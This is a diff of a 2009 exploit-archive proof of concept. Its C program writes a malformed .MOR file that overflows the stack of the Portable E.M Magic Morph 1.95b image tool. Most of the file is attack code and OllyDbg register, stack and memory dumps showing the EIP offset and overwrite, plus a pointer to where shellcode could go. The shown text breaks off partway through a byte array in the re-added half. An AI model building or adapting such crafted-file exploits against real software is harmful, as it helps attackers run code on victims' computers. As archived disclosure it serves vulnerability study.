@@ -1,350 +1,350 @@ - /********************************************************************* - Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC * - By fl0 fl0w * - "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" * - ********************************************************************** - - - /******************************************************************************************************** - The EIP offset is at 312 bytes 0x138 HEX * - After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start * - of the file, and you'll have to rezult with 0x138 bytes * - * - I used a technique names "stack spray" to determine the offset. * - * - CPU REGISTERS * - EAX 00000000 * - ECX 33333333 * - EDX 01492288 * - EBX 00000001 * - * - ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * - ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * - XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 * - EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * - YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b * - bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa * - * - ESI 00F369B0 * - EDI 00F369B0 * - EIP 41414141 * - * - We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. * - So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption* - starts at a much lower address. 
* - This is what ESP points to: * - ******************************************************************************************************** - */ - - /************************ - STACK * - 0012EF7C 62343434 * - 0012EF80 62626262 * - 0012EF84 62626262 * - 0012EF88 67676262 * - 0012EF8C 67676767 * - 0012EF90 67676767 * - 0012EF94 67676767 * - 0012EF98 62676767 * - 0012EF9C 61616161 * - 0012EFA0 61616161 * - 0012EFA4 61616161 * - 0012EFA8 61616161 * - 0012EFAC 61616161 * - 0012EFB0 61616161 * - 0012EFB4 61616161 * - 0012EFB8 61616161 * - 0012EFBC 61616161 * - 0012EFC0 61616161 * - 0012EFC4 61616161 * - 0012EFC8 61616161 * - 0012EFCC 60606060 * - 0012EFD0 60606060 * - 0012EFD4 60606060 * - 0012EFD8 60606060 * - 0012EFDC 60606060 * - 0012EFE0 60606060 * - 0012EFE4 60606060 * - 0012EFE8 60606060 * - 0012EFF0 60606060 * - 0012EFF4 60606060 * - 0012EFF8 60606060 * - 0012EFFC 59595959 * - 0012F000 59595959 * - 0012F004 59595959 * - 0012F008 59595959 * - 0012F00C 59595959 * - ..................... 
* - *********************** -*/ - - -/************************************************* -You can copy your shellcode starting from here : * - 0012EC3C 63636363 * - * - 0x12EF80 = 1240960 ->NOT-> A * - * - 0x12EC3C = 1240124 ->NOT-> B * - * - A > B * - A - B = 836 = 0x344 * - So the stack gets corrupted a long way from ESP.* - ************************************************* - */ - - - - /************************************************* - LOOK OF THE DUMP * - 0012EE4C 63 63 63 63 cccc * - 0012EE54 63 63 63 63 63 63 63 63 cccccccc * - 0012EE5C 32 32 32 32 32 32 32 32 22222222 * - 0012EE64 32 33 33 33 33 33 33 33 23333333 * - 0012EE6C 33 33 33 66 66 66 66 66 333fffff * - 0012EE74 41 41 41 41 77 77 34 34 AAAAww44 * - 0012EE7C 34 34 34 62 62 62 62 62 444bbbbb * - 0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg * - 0012EE8C 67 67 67 67 67 67 67 67 gggggggg * - 0012EE94 67 67 67 67 67 67 67 62 gggggggb * - 0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EECC 60 60 60 60 60 60 60 60 ```````` * - 0012EED4 60 60 60 60 60 60 60 60 ```````` * - 0012EEDC 60 60 60 60 60 60 60 60 ```````` * - 0012EEE4 60 60 60 60 60 60 60 60 ```````` * - 0012EEEC 60 60 60 60 60 60 60 60 ```````` * - 0012EEF4 60 60 60 60 60 60 60 60 ```````` * - 0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX * - 0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX * - 0012EF3C 63 63 63 63 63 63 63 63 cccccccc * - 0012EF44 63 63 63 63 63 63 63 63 cccccccc * - 0012EF4C 63 63 63 63 63 63 63 63 cccccccc * - 0012EF54 63 63 63 63 63 63 63 63 
cccccccc * - 0012EF5C 32 32 32 32 32 32 32 32 22222222 * - 0012EF64 32 33 33 33 33 33 33 33 23333333 * - 0012EF6C 33 33 33 66 66 66 66 66 333fffff * - 0012EF74 41 41 41 41 77 77 34 34 AAAAww44 * - 0012EF7C 34 34 34 62 62 62 62 62 444bbbbb * - 0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg * - 0012EF8C 67 67 67 67 67 67 67 67 gggggggg * - 0012EF94 67 67 67 67 67 67 67 62 gggggggb * - 0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa * - 0012EFCC 60 60 60 60 60 60 60 60 ```````` * - 0012EFD4 60 60 60 60 60 60 60 60 ```````` * - 0012EFDC 60 60 60 60 60 60 60 60 ```````` * - 0012EFE4 60 60 60 60 60 60 60 60 ```````` * - 0012EFEC 60 60 60 60 60 60 60 60 ```````` * - 0012EFF4 60 60 60 60 60 60 60 60 ```````` * - 0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012F004 59 59 59 59 59 59 59 59 YYYYYYYY * - 0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY * - ************************************************* - */ - - /************************************************************************************** - Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org * - Special greetz to OSHO,!_30,str0ke,Carcabot. * - Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. 
* - http://www.sploitz.10001mb.com * - ************************************************************************************* - */ - - /************************************************************************* - DEMO * - C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe * - ********************************************************************* * - Magic Morph .MOR File Stack Buffer Overflow POC * - The usage is: * - All Credits fl0 fl0w * - * - -f FILE.mor * - ************************************************************************** - * - C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST * - File DONE ! * - ************************************************************************** - */ - - /***************************************************************************************** - Technicall details * - This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 * - You can download the POC allong with debugging details from my website * - - Preview ... * - ...... * - This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)* - and the software Portable E.M Magic Morph 1.95b. * - ALL CREDITS GO TO fl0 fl0w for this exploit ! * - http://www.sploitz.10001mb.com/ * - ........................... 
* - ****************************************************************************************** - */ - //START Algorithm - #include "stdio.h" - #include "string.h" - #include "stdlib.h" - #include "windows.h" - #include "stdint.h" - #include "getopt.h" - typedef struct flo { - uint8_t a; - uint8_t b; - uint8_t c; - }F; - - - - void buildFile(char *fname) - { - uint8_t hexfileP1[] = -{ - 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, - 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, - 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73, - 0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, - 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, - 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, - 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, - 0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34, - 0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67, - 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62, - }; - - uint8_t hexfileP2[] = { - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, - 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, - 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
0x56, 0x56, 0x56, 0x56, 0x56, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, - }; - - uint8_t hexfileP3[] = { - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, - 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, - 0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, - 0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, - 0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C, - 0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -} ; - FILE *f; - f = fopen(fname ,"wb"); - F *Gf; - Gf = (F*)malloc(sizeof(F)); - Gf->a = 0x43; - Gf->b = 0x3A; - Gf->c = 0x5C; - uint8_t B[100]; - memcpy(B, Gf, sizeof(Gf)); - fwrite(B, sizeof(uint8_t), 3, f); - fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f); - fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f); - fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f); - fclose(f); - } - void args(int argc, char *argv[]) - { - int file; - int a; - if(a) - while((a = getopt(argc, argv, "f")) != EOF) { - switch(a) { - case 'f': - file = (int)optarg; - break; - default: - exit(-1); - } - } - } - void Usage (char *Name) - { system("CLS"); - printf("*********************************************************************\n"); - fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n"); - printf("The usage is:\n"); - - fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n"); - } - void Menu() - { fprintf(stderr, - "\n" - "\t-f FILE.mor\n" - "*********************************************************************" - "\n"); - } - - int main(int32_t argc , char *argv[]) - { if(argc < 2) { - Usage(argv[0]); - Menu(); - - exit(-1); - } - char b[100]; - strcpy(b, argv[2]); - strcat(b, ".mor"); - buildFile(b); - printf("File DONE !\n"); - return 0; - } - //END Algorithm - -/ 
milw0rm.com [2009-09-14] + /********************************************************************* + Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC * + By fl0 fl0w * + "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" * + ********************************************************************** + + + /******************************************************************************************************** + The EIP offset is at 312 bytes 0x138 HEX * + After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start * + of the file, and you'll have to rezult with 0x138 bytes * + * + I used a technique names "stack spray" to determine the offset. * + * + CPU REGISTERS * + EAX 00000000 * + ECX 33333333 * + EDX 01492288 * + EBX 00000001 * + * + ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * + ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * + XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 * + EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * + YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b * + bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa * + * + ESI 00F369B0 * + EDI 00F369B0 * + EIP 41414141 * + * + We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. * + So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption* + starts at a much lower address. 
* + This is what ESP points to: * + ******************************************************************************************************** + */ + + /************************ + STACK * + 0012EF7C 62343434 * + 0012EF80 62626262 * + 0012EF84 62626262 * + 0012EF88 67676262 * + 0012EF8C 67676767 * + 0012EF90 67676767 * + 0012EF94 67676767 * + 0012EF98 62676767 * + 0012EF9C 61616161 * + 0012EFA0 61616161 * + 0012EFA4 61616161 * + 0012EFA8 61616161 * + 0012EFAC 61616161 * + 0012EFB0 61616161 * + 0012EFB4 61616161 * + 0012EFB8 61616161 * + 0012EFBC 61616161 * + 0012EFC0 61616161 * + 0012EFC4 61616161 * + 0012EFC8 61616161 * + 0012EFCC 60606060 * + 0012EFD0 60606060 * + 0012EFD4 60606060 * + 0012EFD8 60606060 * + 0012EFDC 60606060 * + 0012EFE0 60606060 * + 0012EFE4 60606060 * + 0012EFE8 60606060 * + 0012EFF0 60606060 * + 0012EFF4 60606060 * + 0012EFF8 60606060 * + 0012EFFC 59595959 * + 0012F000 59595959 * + 0012F004 59595959 * + 0012F008 59595959 * + 0012F00C 59595959 * + ..................... 
* + *********************** +*/ + + +/************************************************* +You can copy your shellcode starting from here : * + 0012EC3C 63636363 * + * + 0x12EF80 = 1240960 ->NOT-> A * + * + 0x12EC3C = 1240124 ->NOT-> B * + * + A > B * + A - B = 836 = 0x344 * + So the stack gets corrupted a long way from ESP.* + ************************************************* + */ + + + + /************************************************* + LOOK OF THE DUMP * + 0012EE4C 63 63 63 63 cccc * + 0012EE54 63 63 63 63 63 63 63 63 cccccccc * + 0012EE5C 32 32 32 32 32 32 32 32 22222222 * + 0012EE64 32 33 33 33 33 33 33 33 23333333 * + 0012EE6C 33 33 33 66 66 66 66 66 333fffff * + 0012EE74 41 41 41 41 77 77 34 34 AAAAww44 * + 0012EE7C 34 34 34 62 62 62 62 62 444bbbbb * + 0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg * + 0012EE8C 67 67 67 67 67 67 67 67 gggggggg * + 0012EE94 67 67 67 67 67 67 67 62 gggggggb * + 0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EECC 60 60 60 60 60 60 60 60 ```````` * + 0012EED4 60 60 60 60 60 60 60 60 ```````` * + 0012EEDC 60 60 60 60 60 60 60 60 ```````` * + 0012EEE4 60 60 60 60 60 60 60 60 ```````` * + 0012EEEC 60 60 60 60 60 60 60 60 ```````` * + 0012EEF4 60 60 60 60 60 60 60 60 ```````` * + 0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX * + 0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX * + 0012EF3C 63 63 63 63 63 63 63 63 cccccccc * + 0012EF44 63 63 63 63 63 63 63 63 cccccccc * + 0012EF4C 63 63 63 63 63 63 63 63 cccccccc * + 0012EF54 63 63 63 63 63 63 63 63 
cccccccc * + 0012EF5C 32 32 32 32 32 32 32 32 22222222 * + 0012EF64 32 33 33 33 33 33 33 33 23333333 * + 0012EF6C 33 33 33 66 66 66 66 66 333fffff * + 0012EF74 41 41 41 41 77 77 34 34 AAAAww44 * + 0012EF7C 34 34 34 62 62 62 62 62 444bbbbb * + 0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg * + 0012EF8C 67 67 67 67 67 67 67 67 gggggggg * + 0012EF94 67 67 67 67 67 67 67 62 gggggggb * + 0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa * + 0012EFCC 60 60 60 60 60 60 60 60 ```````` * + 0012EFD4 60 60 60 60 60 60 60 60 ```````` * + 0012EFDC 60 60 60 60 60 60 60 60 ```````` * + 0012EFE4 60 60 60 60 60 60 60 60 ```````` * + 0012EFEC 60 60 60 60 60 60 60 60 ```````` * + 0012EFF4 60 60 60 60 60 60 60 60 ```````` * + 0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012F004 59 59 59 59 59 59 59 59 YYYYYYYY * + 0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY * + ************************************************* + */ + + /************************************************************************************** + Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org * + Special greetz to OSHO,!_30,str0ke,Carcabot. * + Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. 
* + http://www.sploitz.10001mb.com * + ************************************************************************************* + */ + + /************************************************************************* + DEMO * + C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe * + ********************************************************************* * + Magic Morph .MOR File Stack Buffer Overflow POC * + The usage is: * + All Credits fl0 fl0w * + * + -f FILE.mor * + ************************************************************************** + * + C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST * + File DONE ! * + ************************************************************************** + */ + + /***************************************************************************************** + Technicall details * + This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 * + You can download the POC allong with debugging details from my website * + + Preview ... * + ...... * + This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)* + and the software Portable E.M Magic Morph 1.95b. * + ALL CREDITS GO TO fl0 fl0w for this exploit ! * + http://www.sploitz.10001mb.com/ * + ........................... 
* + ****************************************************************************************** + */ + //START Algorithm + #include "stdio.h" + #include "string.h" + #include "stdlib.h" + #include "windows.h" + #include "stdint.h" + #include "getopt.h" + typedef struct flo { + uint8_t a; + uint8_t b; + uint8_t c; + }F; + + + + void buildFile(char *fname) + { + uint8_t hexfileP1[] = +{ + 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, + 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, + 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73, + 0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 